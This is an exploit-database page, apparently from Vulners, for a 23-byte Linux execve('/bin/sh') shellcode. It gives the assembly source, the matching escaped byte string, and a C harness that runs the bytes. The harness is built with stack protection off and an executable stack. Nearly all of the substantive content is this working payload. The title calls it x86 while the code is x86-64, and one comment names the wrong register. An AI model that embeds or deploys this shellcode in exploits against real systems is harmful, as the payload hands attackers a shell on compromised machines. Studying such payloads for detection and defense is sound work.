Vulners
Lucene search
Linux x86 - execve /bin/sh 23 Bytes
/*
Compile with: gcc -fno-stack-protector -z execstack
23 byte execve shellcode
2 ; int execve(const char *filename, char *const argv[], char *const envp[]);
3 BITS 64
4
5 section .text
6 global start
7
8 start:
9 xor rdx, rdx ;zero out rdx
10 push rdx ;push rdx to stack to null terminate /bin//sh
11 mov al, 0x3b ;move 3b into al for execve
12 mov rcx, 0x68732f2f6e69622f ;move the immediate value /bin//sh in hex in rcx
13 push rcx ;push the immediate value stored in rcx onto the stack
14 lea rdi, [rsp] ;load the address of the string that is on the stack into rsi
15 syscall ;make the syscall
*/
char shellcode[] = "\x48\x31\xd2\x52\xb0\x3b\x48\xb9\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x51\x48\x8d\x3c\x24\x0f\x05";
int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) shellcode;
(int)(*func)();
return 0;
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Jun 2015 00:00Current
7.4High risk
Vulners AI Score7.4